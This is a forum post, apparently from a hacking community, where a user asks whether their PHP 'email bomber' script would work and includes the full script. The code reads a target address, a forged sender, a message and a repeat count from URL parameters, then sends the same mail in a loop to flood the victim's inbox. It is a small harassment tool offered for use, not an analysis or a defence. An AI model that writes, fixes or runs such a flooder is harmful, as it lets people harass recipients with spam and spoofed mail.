Login Register


would this work filter_list
Author
Message
would this work #1
I'm trying to make a url based email bomber like an api and i'm not sure if this would work


PHP Code:
<?php $num = 1; $email =$_GET['email']; $spam =$_GET['spam']; $subject =$_GET['subject']; $message =$_GET['message']; $from =$_GET['from']; $send =$_GET['send']; if($spam!='' && $email=='') { die('Please enter an email'); } if(51<=$spam) { die('Error: Number to spam to large. Max is 50 (for security reasons)'); } if($email != '') { while($num<=$spam) { mail ($email, $subject, $message, "From: " . $from); echo $num . "<br>"; $num++; } } ?>
[Image: addskype.png?u=space.bukkit]

Reply





Messages In This Thread
would this work - by Hatsune Miku - 08-10-2014, 11:20 PM
RE: would this work - by Equinox - 08-11-2014, 12:44 AM
RE: would this work - by Hatsune Miku - 08-11-2014, 01:16 AM
RE: would this work - by kyler - 08-11-2014, 04:20 AM
RE: would this work - by 24601 - 09-30-2014, 10:16 AM
RE: would this work - by Eclipse - 09-30-2014, 01:30 PM
RE: would this work - by Reiko - 09-30-2014, 03:39 PM



Users browsing this thread: 1 Guest(s)